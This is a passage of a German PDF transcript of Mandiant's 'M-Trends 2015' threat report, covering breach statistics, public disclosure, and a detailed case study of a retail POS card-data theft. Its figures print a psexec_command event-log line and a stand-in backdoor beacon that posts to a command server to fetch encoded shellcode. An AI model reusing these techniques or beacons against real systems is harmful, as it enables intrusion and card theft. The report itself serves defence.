M-Trends 2015: Ein Bericht von der Cyberfront. Sicherheitsberatung

Größe: px
Ab Seite anzeigen:

Download "M-Trends 2015: Ein Bericht von der Cyberfront. Sicherheitsberatung"

Transkript

1 B e r i c h t z u r B e d r o h u n g s l a g e M-Trends 2015: Ein Bericht von der Cyberfront Sicherheitsberatung

2 M-Trends Ein Bericht von der Cyberfront Inhalt Einleitung... 1 Die Opfer in Zahlen Trend Nr. 1: Opfer im Rampenlicht Eine gut informierte Öffentlichkeit Steigende Erwartungen Warum werden Angriffe zunehmend bekannt gegeben?....5 Trend Nr. 2: Einzelhändler im Fadenkreuz Virtuelle Anwendungsserver als Einfallstor...7 Neue Tools, Methoden und Prozesse Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung....7 Empfehlungen Trend Nr. 3: Raffiniertere Angriffsabläufe Hacken von VPN Bessere Tarnung für Malware Tools und Tricks für den Kennwortdiebstahl Navigation mit WMI und PowerShell Trend Nr. 4: Die Grenzen verschwimmen Kriminelle und APT-Actors imitieren einander Im Zeichen der Unsicherheit die Absicht durchschauen kein leichtes Unterfangen Welche Rolle spielen diese Unterschiede? Schlussfolgerung Über Mandiant Über FireEye... 24

3 Einleitung Bei Mandiant sind wir seit Jahren davon überzeugt, dass es keine absolute Sicherheit geben kann. Die Ereignisse des Jahres 2014 bestätigen dies. Die Wirksamkeit der Sicherheitsmaßnah men in Unternehmen ist im vergangen en Jahr leicht gestiegen. Trotzdem geht das Wettrüsten zwischen Angreifern und Verteidigern weiter und Hacker finden ständig neue Methoden, um Sicherheitsmaßnahmen zu um gehen. In M-Trends 2014 berichteten wir, dass die Cybersecurity sich von einem Thema, an dem einige wenige IT-Verantwortliche interessiert waren, zu einer der obersten Prioritäten für die Unternehmensleitung entwickelt hatte. In diesem Jahr rückte die Cybersicherheit oder streng genommen die Cyber unsicherheit in den Blickpunkt der Öffentlichkeit. Seit Jahresbeginn 2015 wurde das Thema von US-Präsident Obama in seiner Ansprache zur Lage der Nation¹, als Grundlage für einen Hollywood-Film² und selbst in einem Gag bei der Verleihung des Gol den Globe³ aufgegriffen. Da die Berater von Mandiant nach einem schwerwiegenden Angriff oft unter den Ersten sind, die eine kritische Situation analysieren, haben wir einen besonders guten Einblick in die sich ändernden Motive und Taktiken von Hackern. Wir ar beiten seit über zehn Jahren mit Kunden in mehr als 30 Branchen weltweit zusammen. Die in diesem Dokument präsentierten Erkenntnisse und Analysen beruhen auf der Erfahrung, die wir bei der Untersuchung Hunderter kompromittierter Infrastrukturen gesammelt haben. Unternehmen haben kleine Fortschritte zu verzeichnen, doch Hacker bleiben noch immer zu lange unentdeckt, nachdem sie in eine Unternehmens umgebung eingedrungen sind. Der Mittelwert lag 2014 bei 205 Tagen, im Vergleich zu 229 Tagen im Vorjahr. Der Anteil der Unternehmen, die ein Eindringen von Hackern intern aufdeckten, ging sogar leicht zurück: 2014 wurden in 69 Prozent der von uns untersuchten Fälle die betroffenen Unternehmen von der Polizei oder einem anderen Dritten auf die Sicherheitsverletzung aufmerksam gemacht, 2013 waren es 67 Prozent und im Jahr davor 63 Prozent. Der Einzelhandel hatte mit den meisten Vorfällen zu kämpfen, da Angreifer neue Metho den zum Stehlen von Kreditkartendaten von POS-Terminals ausnutzten. In Regionen, wo Kreditkarten mit einem Prozessorchip und einer PIN geschützt sind, stieg die Anzahl der Angriffe auf E-Commerce- Unternehmen und Dienstleister, die Online- Zahlungen abwickeln. Mehrere Branchen, in denen wir bislang eher selten Vorfälle zu verzeichnen hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter Unternehmens- und Beratungsservices, das Gesundheitswesen sowie Behörden und internationale Organisationen. Wenn Sicherheitsteams neue Abwehrmaßnah men installieren, finden Hacker neue Methoden, um sie zu umgehen. Das zeigte sich auch 2014, als Angreifer neue Methoden bzw. raffiniertere Versionen bekannter Methoden nutzten, um virtuelle private Netzwerke (VPN) zu hacken, unentdeckt zu bleiben, Anmeldedaten zu stehlen und über einen langen Zeitraum hinweg Zugriff auf die gehackten Umgebungen zu erhalten. Darüber hinaus ging 2014 eine Rekordzahl von Opfern der Internetkriminalität an die Öffentlichkeit. Eine der ersten Fragen, die immer ge stellt wird, war dabei schwerer zu beantworten als in der Vergangenheit: Wer war das? Die Grenzen zwischen gewöhnlichen Internetkri minellen und staatlich gesponserten Angreifern verschwimmen zunehmend, da Erstere immer raffinierter werden und Letztere oft gängige Schwarzmarkttools verwenden, um in der Szene weniger aufzufallen. Zusammenfassend lässt sich sagen, dass die Bedrohungslage derzeit komplexer ist als je zuvor. Für Sicher heitsteams bedeutet das, dass es immer schwie riger und immer wichtiger wird, Angriffsversuche zu entdecken, zu analysieren, abzuwehren und eventuelle Schäden schnell zu beheben. 1 Michael D. Shear, The New York Times, Obama to Announce Cybersecurity Plans in State of the Union Preview, Januar Sheri Linden, The Hollywood Reporter, Blackhat: Film Review, Januar Christopher Palmeri, Bloomberg, Hollywood Spoiled Brats Are Easy Targets at Golden Globes, Januar

4 M-Trends Ein Bericht von der Cyberfront Die Opfer in Zahlen Hacker nahmen 2014 ein breites Spektrum an Branchen ins Visier, darunter mehrere, die in früheren Jahren kaum von Internetkriminalität betroffen waren. Im Schnitt wurden Angriffe rascher aufgedeckt als 2013, doch die Angreifer konnten noch immer viel zu lange unbemerkt in gehackten Umgebungen ihr Unwesen treiben. Der Anteil der Opfer, die einen Angriff selbst bemerkten, ging zurück. Branchen, in denen Mandiant Angriffe untersuchte Mehrere wichtige Branchen waren bei unseren Untersuchungen deutlich stärker oder weniger stark vertreten als in den Vorjahren: Einzelhandel: Anstieg von 4 % auf 14 % Medien und Unterhaltung: Rückgang von 13 % auf 8 % 17 % Unternehmens- und Beratungsservices 7 % Juristische Dienstleister 14 % Einzelhandel 7 % IT und andere High-Tech- Branchen Mehrere Branchen, in denen wir in früheren Jahren eher selten Vorfälle untersucht hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter: Unternehmens- und Beratungsservices Staatliche und internationale Organisationen Gesundheitswesen 3% 5% 10 % Finanzdienstleistungen 8 % Medien und Unterhaltung 8 % Bau- und Ingenieurwesen 6 % Gesundheitswesen 5 % Transportwesen 3 % Luft-, Raumfahrt- und Rüstungsindustrie 7 % Staatliche und internationale Organisationen 8 % Sonstige 2

5 Die Bedrohungslage im Überblick Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele. Ziel Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage Zugriff und Verbreitung ökonomischer bzw. politischer Vorteil finanzielle Bereicherung Verleumdung, negative öffentliche Aufmerksamkeit Unterbrechung des Betriebs Beispiel Botnetze und Spam APT-Gruppen (Advanced Persistent Threat) Kreditkartendiebstahl Verunstaltung der Website Löschen von Daten Gezielter Angriff Merkmal oft automatisiert anhaltend auffällig oft opportunistisch konfliktmotiviert So werden Angriffe aufgedeckt Zeit zwischen den ersten nachweisbaren Spuren eines Angriffs bis zu seiner Feststellung 31 % der Opfer bemerkten den Vorfall unternehmensintern. 205 Tage Mittelwert der Zeitspanne, die Angreifer in gehackten Netzwerken unbemerkt blieben 69 % der Opfer wurden von einem Dritten auf den Angriff aufmerksam gemacht. 24 Tage weniger als 2013 Längste Präsenz: 2982 Tage APT-Phishing Mo 78 % der analysierten Phishing- s hatten IT- oder sicherheitsrelevante Themen als Aufhänger. Viele stammten angeblich von der IT-Abteilung des angegriffenen Unternehmens oder einem Anbieter von Antivirensoftware. 72 % der Phishing- s wurden an Arbeitstagen versandt. Di Mi Do Fr Sa So 3

6 M-Trends Ein Bericht von der Cyberfront Trend Nr. 1: Opfer im Rampenlicht Nach einem Cyberangriff finden betroffene Unternehmen sich immer häufiger im Brennpunkt eines Medienspektakels wieder und sollen alle Einzelheiten des Angriffs offenlegen. Im Verlauf des Jahres 2014 arbeiteten wir mit über 30 Unternehmen zusammen, die die Öffentlichkeit über einen Datendiebstahl informieren mussten oft im grellen Scheinwerferlicht einer Pressekonferenz. Unserer Erfahrung nach tragen bestätigte Informationen über den Umfang und die Reichweite eines Angriffs dazu bei, dass das betroffene Unternehmen kompetent und souverän erscheint. In der Regel lassen sich dadurch auch das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden. Eine gut informierte Öffentlichkeit Eine scheinbar endlose Kette von Meldungen über Datendiebstähle sensibilisierte die Öffent lichkeit 2014 für die Gefahren und möglichen Auswirkungen gezielter Cyberangriffe. Das führte dazu, dass bei jeder neuen Enthüllung fundiertere und detailliertere Fragen an die Opfer gestellt wurden. Die Medien, Partner, Investoren und Kunden wollen inzwischen weit mehr wissen als wann der Angriff erfolgte und welche Daten betroffen waren. Sie verlangen detaillierte Angaben über alles, vom benutzten Malwaretyp bis hin zu den Methoden, mit denen die Angrei fer sich den Zugriff auf Unternehmensressour cen offen halten konnten. Zudem stehen die Opfer von Cyberangriffen zuneh mend unter dem Druck, die Identität des Angreif ers bekannt zu geben. Wir werden häufig schon am ersten Tag einer Untersuchung gefragt, welche Hackergruppe hinter einem Angriff steckt. Zu diesem Zeitpunkt haben wir jedoch gerade erst damit begonnen, die verfügbaren Fakten zusammenzutragen. Gleichzeitig wird es immer schwerer, diese Frage überhaupt zu be antworten, da die verschiedenen Verdächtigen zunehmend dieselben Tools benutzen (siehe Trend Nr. 4: Die Grenzen verschwimmen Kriminelle und APT-Actors imitieren einander auf Seite 20). Steigende Erwartungen Da das öffentliche Interesse an Cyberangriffen steigt, wird den Verantwortlichen in betroffenen Unternehmen zunehmend klar, wie wichtig eine wirksame und konsistente Öffentlichkeitsarbeit ist, wenn Hacker in die IT-Infrastruktur des Unternehmens eingedrungen sind. Immer mehr Cyberangriffe werden öffentlich bekannt gegeben. Für die Opfer ist das mit schwierigen Ent scheidungen darüber verbunden, wie viele Details sie preisgeben möchten und diese Ent scheidungen müssen oft getroffen werden, wenn noch lange nicht alle Fakten bekannt sind. Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Verständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden. 4

7 Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Verständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidie ren vorangegangener Meldungen und der damit verbun dene Verlust an Glaubwürdig keit vermei den. Zudem fällt es vielen betroffenen Unternehmen schwer, die Berichterstattung unter Kontrolle zu behalten. Öffentliche Spekulationen darüber, wie es den Angreifern gelungen sein könnte, in ein Unternehmen einzudringen, können die Reaktion auf einen Angriff beispielsweise ernst haft behindern. Wir haben in mehreren Fällen beobachtet, dass Sicherheitsexperten bereits wertvolle Zeit mit dem Widerlegen solcher Hypo thesen verbringen mussten, noch bevor sie das Ausmaß des Angriffs abschätzen oder ihn eindämmen konnten. Warum werden Angriffe zunehmend bekannt gegeben? Wir werden oft gefragt, warum sich heute mehr Unternehmen dafür entscheiden, einen erfolgreichen Angriff bekannt zu geben. Wir können diese Frage natürlich nicht für jedes Unternehmen definitiv beantworten, aber uns sind zwei Faktoren bekannt, die diesen Trend fördern: Erstens mussten wir 2014 im Vergleich zu den Vorjahren häufiger auf Angriffe reagieren, bei denen Kreditkarten- und andere personenbezogene Daten gestohlen wurden. Viele Unternehmen müssen solche Fälle bekannt geben, weil gesetzliche Bestimmungen dies vorschreiben. Zweitens wurden 69 Prozent der Angriffe, die wir 2014 untersuchten, nicht vom Opfer selbst aufgedeckt, sondern von einem unternehmensexternen Dritten, beispielsweise einem Zulieferer, Kunden oder den Ermittlungsbehörden. Mit anderen Worten: Die Verantwortlichen in den betroffenen Unternehmen mussten davon ausgehen, dass nicht nur sie selbst und die Angreifer wussten, dass ein Angriff stattgefunden hatte. Unabhängig davon, ob die Öffentlichkeit über einen erfolgreichen Angriff informiert werden soll oder nicht, verlangen die Entscheidungs trä ger innerhalb des Unternehmens natürlich Antworten auf zahlreiche Fragen und zwar sofort. Die Untersuchung kann jedoch Wochen oder sogar Monate dauern und die zur Beantwortung dieser Fragen erforderlichen Fakten schälen sich oft erst im Verlauf der Untersuchung heraus. Deshalb ist es wichtig, das Ausmaß und die Reichweite eines Sicherheitsvorfalls zu kennen, bevor über die Strategie für die Bekanntgabe der Details entschieden wird. Fazit : Die Opfer von Cyberangriffen gehen heute mit größerer Wahrscheinlichkeit an die Öffentlichkeit als früher. Das Medieninteresse ist dabei oft groß. Reportern, Kunden und Geschäftspartnern ist zunehmend bewusst, dass nicht alle Angriffe abgewehrt werden können. Gleichzeitig verlangen sie jedoch mehr Informationen und stellen detailliertere Fragen als noch vor wenigen Jahren. Unternehmen benö tigen eine effektive Strategie für die Öffentlichkeitsarbeit, um sich auf die daraus resultieren den Diskussionen vorzubereiten. Die besten Strategien basieren auf Fakten aus der gründlichen Untersuchung des Vorfalls. 5

8 M-Trends Ein Bericht von der Cyberfront Effektive Untersuchung von Vorfällen Im Folgenden finden Sie einige häufig gestellte Fragen von Reportern, Investoren, Kunden und anderen Interessenten an Unternehmen, die Hackern zum Opfer gefallen sind. Alle Entscheidungsträger und sonstigen Personen, die für das Unternehmen sprechen, sollten die genauen Antworten auf diese Fragen verstehen, um die Verbreitung mehrdeutiger oder inkonsistenter Informationen zu vermeiden. Wie sind die Angreifer in Ihre Infrastruktur eingedrungen? Angreifer nutzen in der Regel eine Kombination aus Social Engineering und einer oder mehreren Schwachstellen, die noch nicht bekannt bzw. behoben sind. Als Einfallstor dient dabei beispielsweise ein mit dem Internet verbundener Server oder ein Malware-Anhang in einer , der echt genug aussieht, um vom Empfänger geöffnet zu werden. Manche Angreifer infizieren sogar Websites, die von ihren anvisierten Opfern häufig besucht werden. Es ist wichtig, dass ein Unternehmenssprecher erklären kann, wie die Angreifer in die Infrastruktur des Unternehmens eingedrungen sind. Noch wichtiger ist möglicherweise, dass er oder sie auch sagen kann, ob dieses Einfallstor geschlossen und die Bedrohung eingedämmt wurde. Wie haben die Angreifer sich den Zugang zu Ihrer Infrastruktur offengehalten? Angreifer versuchen meist, sich dauerhaften Zugang zu einer Umgebung zu verschaffen. Um sie vollständig aus Ihrer Infrastruktur zu entfernen, müssen Sie alle genutzten Einfallstore finden und schließen. Zu den meistgenutzten Einfallstoren gehören sogenannte Backdoors, Webshells sowie der Zugang zu Ihrem VPN und anderen Systemen für den Fernzugriff. Wie ist der Angriff abgelaufen? Wenn Sie nachvollziehen können, wie ein Angreifer in Ihre Infrastruktur eindringen und Daten stehlen konnte, haben Sie den ersten Schritt zur künftigen Abwehr ähnlicher Angriffe getan. Außerdem ist es schwierig, die Auswirkungen eines Angriffs zu ermitteln und zu beheben, wenn Sie das genaue Ausmaß des Angriffs nicht kennen. Welche Daten wurden gestohlen? Um herauszufinden, welche Daten die Angreifer kopiert und entwendet haben, ist meist eine forensische Analyse der betroffenen Systeme erforderlich. Mitunter kann selbst eine solche Analyse diese Frage nicht vollständig beantworten. Sie sollten in jedem Fall Ihre Rechtsabteilung einbeziehen, um zu ermitteln, welche gesetzlichen Verpflichtungen sich aufgrund der Art der gestohlenen bzw. möglicherweise gestohlenen Daten für Ihr Unternehmen ergeben. Haben Sie den Vorfall eingedämmt? Wer die ersten vier Fragen beantworten kann, hat gute Voraussetzungen für die Beantwortung dieser Frage. Wenn Sie den Plan der Angreifer und den Verlauf des Angriffs aufgedeckt haben, können Sie besser auf den Angriff reagieren und mit der Schadensbehebung beginnen. 6

9 Trend Nr. 2: Einzelhändler im Fadenkreuz Allein im Jahr 2014 wurden bei über 1000 Einzelhändlern Kundendaten gestohlen, sodass unzählige Kunden ihre Kreditkarten ersetzen lassen mussten. 4 Neben der riesigen Anzahl der Angriffe fielen unseren Analysten auch mehrere neue Angreifergruppen auf, die diese gebeutelte Branche mit speziellen Tools und Methoden ins Visier nehmen. Virtuelle Anwendungsserver als Einfallstor Mithilfe der Anwendungsvirtualisierung lassen sich virtuelle Desktops konfigurieren, bei denen Benutzer sich per Fernzugriff anmelden, um ei nen begrenzten Zugriff auf bestimmte Program me zu erhalten. Bei korrekter Konfiguration ist ein virtueller Desktop vollständig von dem physi schen Server abgeschirmt, auf dem er ausgeführt wird. Die Benutzer kommen also nicht aus dem virtuellen Desktop heraus und haben keinen direkten Zugriff auf den physischen Server. In manchen Fällen entstehen jedoch schon durch kleine Konfigurationsfehler Lücken in der Abschirmung, die es Angreifern ermöglichen, aus der virtuellen Umgebung auszubrechen und sich direkten Zugriff auf den physischen Server zu verschaffen. In jedem von uns untersuchten Fall mit diesem Angriffsmuster wurde dieselbe Schwachstelle ausgenutzt: Für den Fernzugriff auf die Anwen dung waren nur ein Benutzername und Kenn wort erforderlich. Mit Zwei-Faktor-Authentifizierung lässt sich dieses Einfallstor nahezu vollständig schließen. Neue Tools, Methoden und Prozesse Die von uns beobachteten neuen Angreifergruppen nutzten auch neue Tools, Methoden und Prozesse. Die Expertise der Angreifer deckte das gesamte Spektrum ab, von Anfängern mit gängigen Schwarzmarkttools bis hin zu technisch versierten Gruppen mit raffinierter, speziell auf be stimmte POS-Systeme abgestimmter Malware zum Abschöpfen von Kreditkartendaten. Wir konnten keinen Zusammenhang zwischen den Fähigkeiten und dem Erfolg der Angreifer feststellen. Insbesondere für US-amerikanische Einzelhändler erwies sich Standardmalware vom Schwarz markt für den Diebstahl von Kreditkartendaten als ebenso gefährlich wie professionelle Produkte. Jede der von uns untersuchten Angreifergruppen konnte die Umgebung ihres Opfers unbemerkt ausspionieren, sich Zugang zu den POS-Terminals verschaffen und die Malware für den Diebstahl der Kreditkartendaten installieren. Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN- Authentifizierung Während POS-Terminals in Europa und vielen anderen Regionen längst einen in der Kreditkarte enthaltenen Prozessorchip und eine PIN zur Authentifizierung nutzen, hat sich das nach sei nen Entwicklern Europay, MasterCard und Visa benannte EMV- Verfahren in den USA noch immer nicht durchgesetzt. Das soll sich nun endlich ändern. EMV-fähige Kreditkarten generieren einen eindeutigen Code für jede Transaktion und erschweren Hackern das Fälschen von Trans aktionen dadurch erheblich. Möglicherweise konzentrieren sich Cyber kriminelle stattdessen auf leichtere Beute. In Ländern, in denen standardmäßig EMV verwendet wird, untersuchten wir 2014 im Vergleich zu früheren Jahren eine größere Anzahl von Angriffen auf E-Commerce-Unternehmen und Dienstleister, die Online-Zahlungen abwickeln. 4 U.S. Department of Homeland Security and U.S. Secret Service: Backoff Malware: Infection Assessment, August

10 M-Trends Ein Bericht von der Cyberfront Fallstudie Bei einem Hackerangriff auf eine große US-amerikanische Kaufhauskette wurden die Daten von Millionen von Kreditkarten gestohlen Dieser Angriff ist typisch für eine Ma sche, der 2014 eine Reihe US-amerika nischer Einzelhändler zum Opfer fielen: Die Angreifer verschafften sich mit gültigen Anmeldedaten per Fernzugriff Zugang zu einem System des Opfers und nutzten dann dessen Intranet, um Malware auf den POS-Terminals in den Ladengeschäften zu installieren. Im hier beschriebenen Fall bemerkte das Opfer den Angriff erst, als Behörden drei Mo nate später darauf aufmerksam machten. Eindringen in das Netzwerk Der Angreifer meldete sich mit gültigen Anmeldedaten bei einem Anwendungsserver der Kaufhauskette an und erhielt einen virtuellen Desktop mit begrenzten Privilegien. Wir konnten keine Anzeichen für fehlgeschlagene Anmeldeversuche finden und gehen daher davon aus, dass er sich die Anmeldedaten vor dem Angriff beschafft hatte. Wie ihm das gelang, geht aus den uns vorliegenden Daten nicht hervor. Der Angreifer nutzte dann einen klei nen Fehler in der Konfiguration des virtuellen Desktops aus, um sich zusätzliche Zugriffsrechte zuzuweisen, darun ter Zugang zu einem Befehlszeilentool, mit dem er direkt auf dem Anwendungs server Befehle ausführen konnte. Damit lud er über Windows FTP ein Tool zum Kopieren von Kennwörtern herunter, mit dem er in den Besitz des Administratorkennworts für den Anwendungsserver gelangte. Alle Syste me im Intra net der Kaufhauskette nutzten dasselbe Administratorkennwort. All das dauerte nur wenige Minuten. Ausspionieren und Infizieren des Netzwerks Der Angreifer nutzte zunächst das Framework Metasploit, um die Infra struktur des Opfers auszuspionieren. Metasploit ist ein Open-Source-Framework für Penetrationstests, das eine riesige Auswahl an Modulen zum Aufdecken und Ausnutzen von Schwachstellen enthält. Dank dieser Vielfalt erfre ut es sich sowohl bei Sicherheitsexperten als auch bei Internetkriminellen großer Beliebtheit. Im vorliegenden Fall wurde das Modul psexec_command genutzt, mit dem Be fehle als Windows-Service auf einem anderen System ausgeführt werden können. Alle Aktionen von psexec_command werden in den Logdateien des Systems protokolliert, auf dem sie ausgeführt werden. Der Angreifer durchsuchte weiterhin Systeme im Intranet, konzentrierte sich aber zunehmend auf den Domänencontroller der Zentraldomäne des Unternehmensnetzwerks. Ein Domänencontroller ist ein Server, der zur Administration der Authentifizierung in einer Windows-Umgebung benötigt wird. Dieser Domänencontroller hatte dasselbe Administratorkennwort wie der zuerst gehackte Server und war daher eine leichte Beute. Der Angreifer nutzte das Metasploit-Modul ntdsgrab, um die NTDS-Datenbank und System Registry Hive zu kopieren. Die NTDS-Datenbank enthält für den Domänencontroller wichtige Daten über Active Directory, unter anderem Benutzernamen und Kennwort-Hashes. Das Modul ntdsgrab nutzt den Volume Shadow Copy Service (VSS), um eine Schattenkopie der Partition zu erstellen, auf der die NTDS-Datenbank gespei chert ist. Der eigentl iche Zweck von VSS ist das Erstellen legitimer Momentaufnahmen für die Datensicherung und -wiederherstellung. Der Angreifer missbrauchte den Dienst jedoch, um die NTDS-Datenbank zu stehlen. Im Anschluss nutzte er andere Tools, um die Kennwort-Hashes der Domänenadministratoren zu finden und zu knacken. Damit stand ihm praktisch die gesamte Umgebung offen. Der Angreifer stieg nun auf altbewährte Methoden zum Ausspionieren von Netzwerken um, darunter nicht interaktive Anmeldeversuche, das Tool PsExec aus den Microsoft SysInternals und Anmeldeversuche über das Remote Desktop Protocol (RDP). Nachdem er sich mit den Anmeldedaten des Domänenadministrators auf einem virtualisierten Anwendungsserver angemeldet hatte, konnte der Angreifer sich via RDP mit umfangreichen Zugriffsrechten auf anderen Systemen einloggen. Einrichten von Backdoors Der Angreifer richtete auf mehreren gehackten Systemen Hintertüren ein, um sich dauerhaft Zugang zu ihnen zu sichern. Dazu nutzte er einen schädlichen Gerätetreiber, der speziell für Windows XP entwickelt wurde. Dieser Gerätetreiber wurde zur Übertragung mit einem raffinierten Packer komprimiert, der vergleichbaren Tools in hoch entwickelter, aber gängiger Malware ähnelte. Der Gerätetreiber extrahiert sich zunächst im Arbeits speicher und startet dann einen neuen System-Thread. Daraufhin schickt der entsprechende legitime Gerätetreiber eine Nachricht an das System, dass er nicht geladen werden konnte. Da die Malware in einem anderen Prozess ausgeführt wird als der legitime Gerätetreiber, erkennt das System den zusätzlichen Gerätetreiber nicht. Durch diese Verschleie rungstaktik wird die Analyse der Malware und ihrer Funktionen erschwert. 8

11 So funktioniert psexec_command Der auszuführende Befehl und eine Textdatei für die Ausgabe werden in eine Windows-Batchdatei geschrieben. Die Ausgabe- und die Batchdatei erhalten von einem Zufallsgenerator generierte Namen, die je 16 Zeichen lang sind. Die Batchdatei wird ausgeführt. Abbildung 1 zeigt, was dabei im Systemereignisprotokoll von Windows aufgezeichnet wird. A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYS- TEMDRIVE%\WINDOWS\Temp\TthwsVKvUhydrsNB.txt > \ WINDOWS\Temp\RbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\RbhRmgALAHcdyWXG. bat Service Type: user mode service Service Start Type: demand start Abbildung 1: Das Metasploit-Modul psexec_command installiert einen Service. Die Funktionen dieser Backdoor befinden sich in Shellcode, den der Gerätetreiber in Prozesse einschleust, die im Benutzerbereich, also außerhalb des Windows- Kernels, ausgeführt werden. Dieser Shellcode schickt dann eine HTTP-POST-Abfrage an eine hartkodierte IP-Adresse und lädt einen HTML-Kommentar herunter, der mit XOR kodierten Shellcode enthält. Dank dieser Methode war die Backdoor sehr vielseitig einsetzbar. Wenn der Angreifer neue Funktionen benötigte, konnte er einfach neuen Shellcode herunterladen und ausführen. Diese Nutzung von Shellcode ist nicht neu, aber durch die Kombination mit dem Packer war sie wesentlich schwerer zu finden als ältere Varianten. Abbildung 2 zeigt die Kommunikation zwischen der Backdoor und dem Command-und-Control-Server (CnC- Server). Datendiebstahl Nachdem er das Kennwort des Domänenadministrators geknackt hatte, stand dem Angreifer die gesamte Windows-Umgebung der Kaufhauskette offen. POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: Pragma: no-cache <POST_DATA> gehacktes System Backdoor schickt HTTP-POST- Abfrage an CnC-Server. Mit XOR kodierter Shellcode wird heruntergeladen und ausgeführt. CnC-Server des Angreifers <!-XOR_Encoded_Shellcode --> Abbildung 2: Kommunikation zwischen CnC-Server und Backdoor 9

12 M-Trends Ein Bericht von der Cyberfront Alle POS-Terminals in der gesamten Kaufhauskette nutzten denselben Domänencontroller für die Authentifizierung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Er konzentrierte sich jedoch auf die Verkaufsumgebung. Diese Umgebung war wie folgt konfiguriert: Zwischen der Verkaufsdomäne und der Zentraldomäne des Unternehmens war ein Two-Way-Trust konfiguriert. Auf den POS-Terminals lief Microsoft Windows XP. Die POS-Terminals waren mit der Verkaufsdomäne verbunden. Diese im Einzelhandel weit verbreitete Konfiguration hat zwei Schwachpunkte, die der Angreifer ausnutzen konnte. Erstens konnte er die zuvor erbeuteten Anmeldedaten des Domänenadministrators der Zentraldomäne nutzen, um privilegierten Zugriff auf die Verkaufsdomäne zu erlangen. Zweitens war die Verkaufsdomäne eine untergeordnete Domäne der Zentraldomäne. Manche Funktionen funktionierten nur, wenn bestimmte wichtige Ports zwischen der Zentral- und Verkaufsdomäne offen blieben. Über diese offenen Ports konnten jedoch alle Firewall-Kontrollen der Kaufhauskette um gangen werden. Der Angreifer nutzte diese offenen Ports, um auf den Domänencontroller zuzugreifen und von dort in die Verkaufsdomäne zu gelangen. Alle POS-Terminals in der gesamten Kaufhauskette nutzten denselben Domänencontroller für die Authentifizie rung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Der Angreifer nutzte eine Windows-Batchdatei auf dem Domä nencontroller der Verkaufsdomäne, um alle POS-Terminals in der gesamten Kaufhauskette mit Malware zum Stehlen von Kreditkartendaten zu infizieren. Der Angreifer führte die Malware als geplante Windows-Aufgabe aus. Die auf den POS-Terminals installierte Malware las die auf dem Magnetstreifen der Kreditkarten gespeicherten Kartennummern und das Ablaufdatum sowie weitere Transaktionsdetails aus dem Prozessspeicher der POS-Anwendung aus und sammelte sie. Angreifer können diese Daten an andere Kriminelle verkaufen, die Kreditkarten fälschen. Zum Erfassen der Kreditkarten- und Transaktionsdaten nutzte die Malware OSQL, ein befehlszeilenbasiertes Tool für SQL-Abfragen, das bereits auf den POS- Terminals installiert war. Die gestohlenen Daten wurden dann in einer temporären MSSQL-Datenbank namens tempdb gespeichert. Wenn MSSQL gestoppt wird, werden alle Daten in tempdb automatisch gelöscht. Einmal täglich startete der Angreifer eine SQL-Abfrage, um die Daten aus den tempdb aller POS-Terminals in einer Textdatei auf dem Domänencontroller zu speichern. Dort archivierte er die Textdatei und schickte sie an eine mit dem Internet verbundene Workstation in der Verkaufsdomäne. Von dieser Workstation aus konnte er die archivierte Datei mit den gestohlenen Daten per FTP an einen von ihm kontrollierten Server schicken. Abbildung 3 stellt den Verlauf des Angriffs grafisch dar. 10

13 1 Der Angreifer meldet sich mit gültigen Anmeldedaten per Der Angreifer überträgt die Fernzugriff an einem Server des Opfers an, auf dem eine 4 gestohlenen Daten von den virtualisierte Anwendung läuft. POS-Terminals über den Domänencontroller der Verkaufsdomäne auf eine Angreifer Benutzer-Workstation in erster Zugriff Ausschleusen der Daten via FTP derselben Domäne. Von dort überträgt er sie mit FTP auf einen externen Server. Kommunikation mit dem CnC-Server Zentraldomäne Verkaufsdomäne Laden 1 DMZ Benutzer- Workstation Benutzer- Workstation POS-Terminal1 POS-Terminal 2 virtueller Anwendungsserver Hauptdomänencontroller Domänencontroller der Verkaufsdomäne POS-Terminal 1 POS-Terminal 2 Laden 2 Der Angreifer bricht aus der virtualisierten Der Angreifer nutzt den Domänencontroller 2 Anwendungsumgebung aus und erkundet das der Verkaufsdomäne, um auf die POS-Terminals zuzugreifen und sie mit Malware zum Unternehmensnetzwerk. Dort erbeutet er Anmeldedaten für weitere Systeme. Stehlen von Kreditkarten- und Transaktionsdaten zu infizieren. 3 Abbildung 3: Verlauf des Angriffs 11

